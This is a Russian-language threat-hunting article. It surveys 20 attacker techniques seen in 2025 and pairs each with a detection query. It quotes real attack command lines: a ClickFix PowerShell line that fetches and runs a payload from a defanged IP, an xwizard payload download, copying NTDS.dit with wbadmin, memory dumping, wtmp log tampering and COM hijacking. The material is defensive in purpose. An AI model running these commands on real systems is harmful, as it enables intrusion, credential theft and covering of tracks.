Кибербез мирового уровня: разбор 20 техник
6 мин
200
5
1. BOINC
Одна из новинок 2025 года — использование злоумышленниками BOINC, широко известной как «ПО для науки». Это открытая программная платформа университета Беркли для GRID-вычислений. Она позволяет задействовать огромные вычислительные мощности персональных компьютеров со всего мира, которые владельцы предоставляют добровольно. Атакующие использовали BOINC в фишинговой кампании — вместо легитимного обновления устанавливался BOINC-клиент, сконфигурированный подключаться не к научным проектам, а к доменам под контролем атакующих. Обнаружить антивирусными средствами этот инструмент оказалось сложно, ведь он не является ВПО.
Как обнаружить:
Поискать события запуска файлов, метаданные которых указывают на BOINC:
event_type: "processcreatewin"
AND
proc_file_productname: "boinc"
2. Microsoft console debugger
В числе не самых распространённых методов, которые практикуют злоумышленники — применение кода Microsoft console debugger (cdb.exe). Примечательно, что одна из группировок использовала его в переименованном виде для запуска шелл-кода:
C:\ProgramData\fontdrvhost.exe -cf
C:\ProgramData\config.ini -o
C:\ProgramData\fontdrvhost.exe
Важно отметить — злоумышленники часто переименовывают файл, что даёт киберспециалистам больше возможностей для их обнаружения. Поэтому поиски стоит начинать с переименованных копий и определённых параметров командной строки, которые используются для выполнения шелл-кода.
Как обнаружить:
Поискать события запуска MCD, в том числе переименованного, с параметром -cf:
event_type: "processcreatewin"
AND
proc_file_originalfilename: "cdb.exe"
AND
cmdline: "cf"
3. Скрипты ДЛЯ FTP
Стандартные утилиты (например, FTP) злоумышленники нередко используют для эксфильтрации, в том числе в рамках атак программ-вымогателей. Со стороны ИБ-мониторинга такой трафик часто выглядит как обычная работа легитимного FTP-сервиса. В одной из атак на тайские организации нападающие использовали ftp.exe для выполнения скрипта, замаскированного под обычный PDF-файл:
C:\Windows\System32\ftp.exe -s:"แบบตอบรับ.pdf«»
Как обнаружить:
Поискать события запуска ftp.exe с параметром -s и подозрительными PDF-файлами:
event_type: "processcreatewin"
AND
proc_file_path: "ftp.exe"
AND
cmdline: ("s" AND *.pdf)
4. VS Code Remote Tunnels
Атакующие продолжают активно использовать сервисы удалённой работы, одним из таких в 2025 году стал VS Code Remote Tunnels. Как минимум в пяти публичных отчётах зарубежных компаний было упомянуто применение этой программы для удалённого подключения к скомпрометированной системе. Детектируется этот метод атак сложно, так как сервис является легитимным.
Как обнаружить:
Поискать события запуска code.exe с аргументом tunnel:
event_type: "processcreatewin"
AND
proc_file_path: "code.exe"
AND
cmdline: "tunnel"
5. Windows Sandbox
Если ИБ-специалисты используют песочницы, чтобы изучить поведенческие маркеры вредоносных файлов, то злоумышленники применяют их иначе. Например, чтобы внедрить в песочницу ВПО, которое антивирусы не обнаружат. Так, атакующие использовали Windows Sandbox, чтобы запустить кастомизированную версию AsyncRAT.
Как обнаружить:
Поискать события запуска Window Sandbox с WSB-файлом в аргументах:
event_type: "processcreatewin"
AND
proc_file_name: ("WindowsSandbox.exe" OR "wsb.exe")
AND
cmdline: *.wsb
6. Clickfix
Одна из самых часто используемых техник за рубежом на сегодняшний день — атаки Clickfix. В России они уже тоже не редкость. Это поддельная CAPTCHA: пользователь копирует вредоносную команду, вставляет в систему и по сути самостоятельно запускает вредоносные скрипты. Впервые применение этой тактики было замечено весной 2024 года. За прошедшее время злоумышленники успели придумать целый ряд сценариев её применения. Чаще всего атака начинается со всплывающего окна, имитирующего нотификацию о какой-либо технической проблеме. Меня заинтересовало, как злоумышленники создавали ссылки для скачивания вредоносной нагрузки. Например, атакующие генерировали динамические ссылки на загрузку, используя количество секунд с 1 января 1970 года, и каждую секунду ссылка менялась:
powershell -w h -c
"$u=[int64](([datetime]::UtcNow-
[datetime]'1970-1-1').TotalSeconds)-
band 0xfffffffffffffff0;irm
168.119.173[.]205:8080/$u|iex"
Как обнаружить:
Использовать различные наборы ключевых слов. Например:
event_type: "processcreatewin"
AND
proc_file_path: "powershell.exe"
AND
cmdline: ("datetime" AND "UtcNow" AND "1970" AND "iex")
7. Эмулятор Qemu
В отчётах компаний об инцидентах встречается применение атакующими ещё одной песочницы — Qemu. Это бесплатный эмулятор и гипервизор, позволяющий запускать другие операционные системы в качестве гостевых на компьютере. Злоумышленники использовали его для запуска виртуальной машины и QDoor внутри неё.
"C:\ProgramData\UpdatePackage_excic\wexe" -m 4096 -hda Update_excic.aow2 -netdev user,id=mynet0 -device e1000,netdev=mynet0 -cpu max -display none
Как обнаружить:
Поискать события запуска, переименованного QEMU с параметром netdev:
event_type: "processcreatewin"
AND
proc_file_productname: "qemu"
AND
cmdline: "netdev"
8. BASE85
Злоумышленники также используют сложные методы запутывания кода — обфускации, включая кодирование Base85. В упомянутом одной из компаний случае атакующие мало того, что использовали Python Launcher, они также обфусцировали саму команду Base85.
"C:/winsystem/py/py.exe" -c exec(import('marshal').loads(import('zlib').decompress(import('base64').b85decode('[redacted]'))))
Как обнаружить:
event_type: "processcreatewin"
AND
cmdline: "b85decode"
9. ASPIA
В публичных отчётах есть примеры использования непопулярных средств удалённого резервного доступа к скомпрометированной ИТ-инфраструктуре. Мы все привыкли к TeamViewer, AnyDesk, однако малоизвестные сервисы киберпреступники также используют для создания резервных каналов управления. К примеру, киберпартизаны в качестве средства резервного доступа к скомпрометированной ИТ-инфраструктуре использовали Aspia.
Как обнаружить:
Поискать этот RMM, опираясь, например, на название продукта в метаданных:
event_type: "processcreatewin"
AND
proc_file_productname: "aspia"
10. Снова Clickfix
На одном из теневых форумов злоумышленник рекламировал новый вариант для реализации методов Clickfix. При этом он упомянул, что скрипт способен после достижения цели удалить следы запуска из истории. Так что если у вас что-то очищает RunMRU, то стоит проверить легитимно ли это и кто инициатор.
Как обнаружить:
Поискать события очистки RunMRU:
event_type: "registryobjdelete"
AND
reg_key_path: "runmru"
11. Microsoft windows resource leak diagnostic
Компании отмечают применение злоумышленниками еще одного LOLBins — Microsoft windows resource leak diagnostic. Это встроенный в Windows инструмент диагностики утечек ресурсов. Атакующие использовали его, чтобы получить дамп памяти.
rdrleakdiag /p [REMOVED] /o
CSIDL_PROFILE\downloads /fullmemdmp
/wait 1
С точки зрения обнаружения здесь всё довольно понятно — необходимо начать поиск события запуска rdrleakdiag.exe с соответствующим параметром.
Как обнаружить:
event_type: "processcreatewin"
AND
proc_file_path: "rdrleakdiag.exe"
AND
cmdline: "fullmemdmp"
12. Hugging Face API
Конечно, в отчётах об инцидентах всё чаще встречаются примеры использования злоумышленниками LLM. Например, вредоносное ПО LameHug применяет LLM для генерации команд с целью сбора информации о скомпрометированной системе и эксфильтрации данных.
Как обнаружить:
Поискать подозрительные файлы, например с расширением .pif, обращающиеся к Hugging Face:
event_type: "dnsreqwin"
AND
dns_rname: huggingface
AND
proc_file_path: *pif
13. UTMPDUMP
Когда ИБ специалисты расследуют инцидент и собирают логи, они задаются вопросом: могли ли злоумышленники что-то поменять в логах? Чаще всего ответ положительный. В системе Linux всё записывается в файлы логов в каталоге /var/log. В этом каталоге есть несколько файлов, таких как utmp, wtmp и btmp. В частности, utmp предоставляет информацию о входе пользователей в систему, терминалах, выходах из системы, системных событиях и текущем состоянии системы, времени загрузки системы и т. д., а wtmp предоставляет исторические данные utmp. В своих отчётах компании перечисляют примеры использования атакующими копий wtmp:
атакующие делали копию wtmp:
utmpdump /var/log/wtmp >/var/log/wtmp.file
Удаляли оттуда свои IP-адреса:
sed -i '/
И перезаписывали wtmp:
utmpdump -r /var/log/wtmp.file > /var/log/wtmp
Как обнаружить:
Поискать подозрительные запуски utmpdump:
event_type: "processcreatenix"
AND
proc_file_path: "utmpdump"
cmdline: "wtmp"
14. Файлы DESKTOP
Фишингом уже никого не удивить, но встречаются интересные векторы атак. Например, в прошлом году злоумышленники реализовывали фишинговые почтовые рассылки, нацеленные на пользователей Linux. При этом использовались файлы .desktop, например Document Details.pdf .desktop.
Как обнаружить:
Поискать открытие подозрительных файлов .desktop.
event_type: "processcreatenix"
AND
cmdline.keyword: /..desktop\s./
15. Wbadmin
Часто в отчётах упоминается Wbadmin. С его помощью можно удалить резервные копии Windows. Злоумышленники могут также скопировать базу данных NTDS.dit:
"C:\Windows\system32\wbadmin.exe" start backup -backupTarget:\localhost\c$\ProgramData\ -include:C:\Windows\NTDS\NTDS.dit -quiet
Как обнаружить:
В очередной раз можем сфокусироваться на параметрах командной строки.
event_type: "processcreatewin"
AND
proc_file_path: "wbadmin.exe"
AND
cmdline: "ntds.dit"
16. Extensible Wizards Host Process
Атакующие использовали Extensible Wizards Host Process для загрузки вредоносного файла с удаленного сервера:
XwIZarD.exe RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z
hXXps://gbuarts[.]com/cc/Protected.exe
Как обнаружить:
Поохотиться за злоупотреблением EWHP.
event_type: "processcreatewin"
AND
proc_file_path: "xwizard.exe"
AND
cmdline: http
17. COM hijacking
В последнее время группировки злоумышленников предпочитают использовать разделы реестра, связанные с com-объектами, чтобы закрепиться в скомпрометированной системе. Например, APT-группировка Rainbow использовала COM hijiacking — это способ закрепиться в Windows, подменяя настройки COM-объектов в реестре:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -c
New-Item -Path
'HKCU:\Software\Classes\CLSID{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InprocServer32' -Force |
Set-Item -Value 'C:\ProgramData\winnt64_.dll'; [redacted]
Как обнаружить:
Поискать похожее злоупотребление PowerShell.
event_type: "processcreatewin"
AND
proc_file_path: "powershell.exe"
AND
cmdline: ("InprocServer32" AND "set-item" AND "value")
18. Change default file association
Ещё один нетипичный пример закрепления в системе — Change default file association. (сменить программу по умолчанию для открытия файлов определённого типа). В реальных атаках редко встречается. Злоумышленники модифицировали следующий раздел реестра, чтобы вредоносное ПО запускалось при каждом открытии текстового файла:
HKEY_CLASSES_ROOT\txtfile\shell\open\command
Как обнаружить:
Поискать события модификации этого раздела.
event_type: "registryvaluesetwin"
AND
reg_key_path: "txtfile\shell\open\command"
19. Maxscriptstatements
Злоумышленники используют Maxscriptstatements, чтобы запустить вредоносные HTML-файлы. В одной из атак они задействовали реестр, чтобы пользователь не получал оповещения при выполнении длинных скриптов и, таким образом, не привлекалось внимание к запуску ВПО:
Значение параметра MaxScriptStatements в
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles
выставлялось равным 10 000 000
Как обнаружить:
Поискать события модификации MaxScriptStatements.
event_type: "registryvaluesetwin"
AND
reg_key_path: "MaxScriptStatements"
20. Request repo
Ещё один легитимный сервис — Request repo, который злоумышленники использовали для анализа HTTP- и DNS-запросов для эксфильтрации аутентификационных данных. Это впоследствии помогало им подключаться к скомпрометированной системе через Visual Studio Code.
Как обнаружить:
Поискать подозрительные запросы к Request Repo с учетом особенностей ВПО.
event_type: "dnsreqwin"
AND
dns_rname: "requestrepo.com"
AND
proc_file_path: "pythonw.exe"
Злоумышленники постоянно меняют подходы и инструменты, которые используют для совершения атак. Актуальную информацию киберспециалисты аккумулируют и указывают в публичных отчётах, которые, в свою очередь, помогают нам отследить подозрительную активность и оперативно отреагировать на угрозу. Это процесс бесконечный, и нужно постоянно находиться в инфополе.
